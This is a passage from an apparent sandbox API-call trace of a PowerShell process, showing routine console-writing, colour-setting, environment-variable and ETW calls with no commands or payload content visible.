pguid=0x653ef82af8*(Data1=0x995e8764, Data2=0x6a1e, Data3=0x44a2, Data4=([0]=0xaa, [1]=0xc5, [2]=0x8a, [3]=0xca, [4]=0x6e, [5]=0xf8, [6]=0x81, [7]=0xa))) returned 0x0 [0272.471] EtwEventActivityIdControl () returned 0x0 [0272.471] EtwEventActivityIdControl () returned 0x0 [0272.471] EtwEventActivityIdControl () returned 0x0 [0272.472] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfbf60 [0272.472] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73cfbf60, nSize=0x105 | out: lpBuffer="") returned 0x0 [0272.472] CoTaskMemFree (pv=0x25b73cfbf60) [0272.472] EtwEventActivityIdControl () returned 0x0 [0272.472] EtwEventActivityIdControl () returned 0x0 [0272.472] EtwEventActivityIdControl () returned 0x0 [0272.472] EtwEventActivityIdControl () returned 0x0 [0272.641] EtwEventActivityIdControl () returned 0x0 [0272.641] EtwEventActivityIdControl () returned 0x0 [0273.710] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa3c0 [0273.710] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x25b73cfa3c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0273.710] CoTaskMemFree (pv=0x25b73cfa3c0) [0274.650] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef836c8 | out: lpConsoleScreenBufferInfo=0x653ef836c8) returned 1 [0274.655] GetConsoleOutputCP () returned 0x1b5 [0274.657] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef83578, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef83578) returned 0 [0274.657] GetConsoleOutputCP () returned 0x1b5 [0274.657] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef83578, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef83578) returned 0 [0274.657] GetConsoleOutputCP () returned 0x1b5 [0274.658] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef83578, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef83578) returned 0 [0274.658] GetConsoleOutputCP () returned 0x1b5 [0274.658] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef83578, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef83578) returned 0 [0274.658] GetConsoleOutputCP () returned 0x1b5 [0274.658] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef83578, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef83578) returned 0 [0274.658] GetConsoleOutputCP () returned 0x1b5 [0274.659] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef83578, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef83578) returned 0 [0274.659] GetConsoleOutputCP () returned 0x1b5 [0274.659] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef83578, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef83578) returned 0 [0274.660] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835f8 | out: lpConsoleScreenBufferInfo=0x653ef835f8) returned 1 [0274.661] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.661] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.663] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.663] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0274.664] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.665] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0274.666] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef835d0 | out: lpMode=0x653ef835d0) returned 1 [0274.668] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c1459fc*, nNumberOfCharsToWrite=0x5f, lpNumberOfCharsWritten=0x653ef835c0, lpReserved=0x0 | out: lpBuffer=0x25b5c1459fc*, lpNumberOfCharsWritten=0x653ef835c0*=0x5f) returned 1 [0274.672] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef83558 | out: lpConsoleScreenBufferInfo=0x653ef83558) returned 1 [0274.673] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0274.673] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef83558 | out: lpConsoleScreenBufferInfo=0x653ef83558) returned 1 [0274.673] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0274.674] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef83670 | out: lpMode=0x653ef83670) returned 1 [0274.674] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef83660, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef83660*=0x1) returned 1 [0274.674] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835f8 | out: lpConsoleScreenBufferInfo=0x653ef835f8) returned 1 [0274.675] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.675] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.676] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.676] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0274.676] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.677] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0274.677] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef835d0 | out: lpMode=0x653ef835d0) returned 1 [0274.677] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c145ad4*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x653ef835c0, lpReserved=0x0 | out: lpBuffer=0x25b5c145ad4*, lpNumberOfCharsWritten=0x653ef835c0*=0x13) returned 1 [0274.678] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef83558 | out: lpConsoleScreenBufferInfo=0x653ef83558) returned 1 [0274.678] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0274.679] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef83558 | out: lpConsoleScreenBufferInfo=0x653ef83558) returned 1 [0274.679] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0274.679] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef83670 | out: lpMode=0x653ef83670) returned 1 [0274.680] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef83660, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef83660*=0x1) returned 1 [0274.680] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835f8 | out: lpConsoleScreenBufferInfo=0x653ef835f8) returned 1 [0274.680] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.681] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.681] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.681] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0274.682] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.682] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0274.682] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef835d0 | out: lpMode=0x653ef835d0) returned 1 [0274.683] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c145b14*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x653ef835c0, lpReserved=0x0 | out: lpBuffer=0x25b5c145b14*, lpNumberOfCharsWritten=0x653ef835c0*=0x4f) returned 1 [0274.684] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef83558 | out: lpConsoleScreenBufferInfo=0x653ef83558) returned 1 [0274.684] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0274.685] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef83558 | out: lpConsoleScreenBufferInfo=0x653ef83558) returned 1 [0274.685] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0274.685] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef83670 | out: lpMode=0x653ef83670) returned 1 [0274.686] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef83660, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef83660*=0x1) returned 1 [0274.686] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835f8 | out: lpConsoleScreenBufferInfo=0x653ef835f8) returned 1 [0274.686] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.687] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.687] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.687] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0274.688] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.688] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0274.688] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef835d0 | out: lpMode=0x653ef835d0) returned 1 [0274.689] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c145bcc*, nNumberOfCharsToWrite=0x43, lpNumberOfCharsWritten=0x653ef835c0, lpReserved=0x0 | out: lpBuffer=0x25b5c145bcc*, lpNumberOfCharsWritten=0x653ef835c0*=0x43) returned 1 [0274.689] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef83558 | out: lpConsoleScreenBufferInfo=0x653ef83558) returned 1 [0274.689] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0274.690] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef83558 | out: lpConsoleScreenBufferInfo=0x653ef83558) returned 1 [0274.690] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0274.690] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef83670 | out: lpMode=0x653ef83670) returned 1 [0274.691] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef83660, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef83660*=0x1) returned 1 [0274.691] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835f8 | out: lpConsoleScreenBufferInfo=0x653ef835f8) returned 1 [0274.691] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.692] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.692] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.692] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0274.693] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.693] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0274.693] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef835d0 | out: lpMode=0x653ef835d0) returned 1 [0274.694] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c145c6c*, nNumberOfCharsToWrite=0x4d, lpNumberOfCharsWritten=0x653ef835c0, lpReserved=0x0 | out: lpBuffer=0x25b5c145c6c*, lpNumberOfCharsWritten=0x653ef835c0*=0x4d) returned 1 [0274.694] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef83558 | out: lpConsoleScreenBufferInfo=0x653ef83558) returned 1 [0274.695] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0274.695] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef83558 | out: lpConsoleScreenBufferInfo=0x653ef83558) returned 1 [0274.695] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0274.696] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef83670 | out: lpMode=0x653ef83670) returned 1 [0274.696] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef83660, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef83660*=0x1) returned 1 [0274.696] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835f8 | out: lpConsoleScreenBufferInfo=0x653ef835f8) returned 1 [0274.697] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.697] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.697] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.698] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0274.698] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.698] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0274.699] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef835d0 | out: lpMode=0x653ef835d0) returned 1 [0274.699] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c145d24*, nNumberOfCharsToWrite=0x2a, lpNumberOfCharsWritten=0x653ef835c0, lpReserved=0x0 | out: lpBuffer=0x25b5c145d24*, lpNumberOfCharsWritten=0x653ef835c0*=0x2a) returned 1 [0274.700] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef83558 | out: lpConsoleScreenBufferInfo=0x653ef83558) returned 1 [0274.700] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0274.700] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef83558 | out: lpConsoleScreenBufferInfo=0x653ef83558) returned 1 [0274.701] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0274.701] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef83670 | out: lpMode=0x653ef83670) returned 1 [0274.701] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef83660, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef83660*=0x1) returned 1 [0274.702] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835f8 | out: lpConsoleScreenBufferInfo=0x653ef835f8) returned 1 [0274.703] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.703] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.703] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.704] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0274.704] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef835a8 | out: lpConsoleScreenBufferInfo=0x653ef835a8) returned 1 [0274.704] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0274.705] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef835d0 | out: lpMode=0x653ef835d0) returned 1 [0274.705] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c145d94*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef835c0, lpReserved=0x0 | out: lpBuffer=0x25b5c145d94*, lpNumberOfCharsWritten=0x653ef835c0*=0x1) returned 1 [0274.705] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef83558 | out: lpConsoleScreenBufferInfo=0x653ef83558) returned 1 [0274.706] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0274.706] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef83558 | out: lpConsoleScreenBufferInfo=0x653ef83558) returned 1 [0274.706] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0274.707] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef83670 | out: lpMode=0x653ef83670) returned 1 [0274.707] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef83660, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef83660*=0x1) returned 1 [0274.887] EtwEventActivityIdControl () returned 0x0 [0274.887] EtwEventActivityIdControl () returned 0x0 [0274.888] EtwEventActivityIdControl () returned 0x0 [0274.888] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x653ef89ee0, nSize=0xe4 | out: lpBuffer="") returned 0x0 [0274.888] EtwEventActivityIdControl () returned 0x0 [0274.888] EtwEventActivityIdControl () returned 0x0 [0274.888] EtwEventActivityIdControl () returned 0x0 [0274.889] EtwEventActivityIdControl () returned 0x0 [0274.889] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x20c [0274.889] EtwEventActivityIdControl () returned 0x0 [0274.889] EtwEventActivityIdControl () returned 0x0 [0274.889] EtwEventActivityIdControl () returned 0x0 [0274.889] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x653ef89200, nSize=0xe4 | out: lpBuffer="") returned 0x0 [0274.890] EtwEventActivityIdControl () returned 0x0 [0274.890] EtwEventActivityIdControl () returned 0x0 [0274.890] EtwEventActivityIdControl () returned 0x0 [0274.891] EtwEventActivityIdControl () returned 0x0 [0275.632] EtwEventActivityIdControl () returned 0x0 [0275.633] EtwEventActivityIdControl () returned 0x0 [0275.633] EtwEventActivityIdControl () returned 0x0 [0275.633] EtwEventActivityIdControl () returned 0x0 [0275.633] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8aa98 | out: lpConsoleScreenBufferInfo=0x653ef8aa98) returned 1 [0275.634] EtwEventActivityIdControl () returned 0x0 [0275.634] EtwEventActivityIdControl () returned 0x0 [0275.634] EtwEventActivityIdControl () returned 0x0 [0275.634] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x653ef89ee0, nSize=0xe4 | out: lpBuffer="") returned 0x0 [0275.634] EtwEventActivityIdControl () returned 0x0 [0275.634] EtwEventActivityIdControl () returned 0x0 [0275.634] EtwEventActivityIdControl () returned 0x0 [0275.635] EtwEventActivityIdControl () returned 0x0 [0275.635] EtwEventActivityIdControl () returned 0x0 [0275.635] EtwEventActivityIdControl () returned 0x0 [0275.649] EtwEventActivityIdControl () returned 0x0 [0275.649] EtwEventActivityIdControl () returned 0x0 [0275.649] EtwEventActivityIdControl () returned 0x0 [0275.649] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x653ef89ee0, nSize=0xe4 | out: lpBuffer="") returned 0x0 [0275.651] EtwEventActivityIdControl () returned 0x0 [0275.651] EtwEventActivityIdControl () returned 0x0 [0275.651] EtwEventActivityIdControl () returned 0x0 [0275.651] EtwEventActivityIdControl () returned 0x0 [0275.651] EtwEventActivityIdControl () returned 0x0 [0275.651] EtwEventActivityIdControl () returned 0x0 [0275.841] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b608 | out: lpConsoleScreenBufferInfo=0x653ef8b608) returned 1 [0275.842] GetConsoleOutputCP () returned 0x1b5 [0275.842] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef8b4b8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef8b4b8) returned 0 [0275.842] GetConsoleOutputCP () returned 0x1b5 [0275.843] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef8b4b8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef8b4b8) returned 0 [0275.843] GetConsoleOutputCP () returned 0x1b5 [0275.843] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef8b4b8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef8b4b8) returned 0 [0275.843] GetConsoleOutputCP () returned 0x1b5 [0275.844] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef8b4b8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef8b4b8) returned 0 [0275.844] GetConsoleOutputCP () returned 0x1b5 [0275.844] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef8b4b8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef8b4b8) returned 0 [0275.844] GetConsoleOutputCP () returned 0x1b5 [0275.844] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef8b4b8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef8b4b8) returned 0 [0275.844] GetConsoleOutputCP () returned 0x1b5 [0275.845] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef8b4b8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef8b4b8) returned 0 [0275.845] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b538 | out: lpConsoleScreenBufferInfo=0x653ef8b538) returned 1 [0275.845] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.846] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.846] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.846] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0275.847] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.847] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0275.848] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b510 | out: lpMode=0x653ef8b510) returned 1 [0275.848] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5bffcf54*, nNumberOfCharsToWrite=0x1f, lpNumberOfCharsWritten=0x653ef8b500, lpReserved=0x0 | out: lpBuffer=0x25b5bffcf54*, lpNumberOfCharsWritten=0x653ef8b500*=0x1f) returned 1 [0275.849] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0275.849] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0275.850] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0275.850] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0275.851] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b5b0 | out: lpMode=0x653ef8b5b0) returned 1 [0275.851] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b5a0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef8b5a0*=0x1) returned 1 [0275.852] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b538 | out: lpConsoleScreenBufferInfo=0x653ef8b538) returned 1 [0275.852] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.853] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.853] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.853] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0275.854] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.854] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0275.855] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b510 | out: lpMode=0x653ef8b510) returned 1 [0275.855] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5bffcfac*, nNumberOfCharsToWrite=0x13, 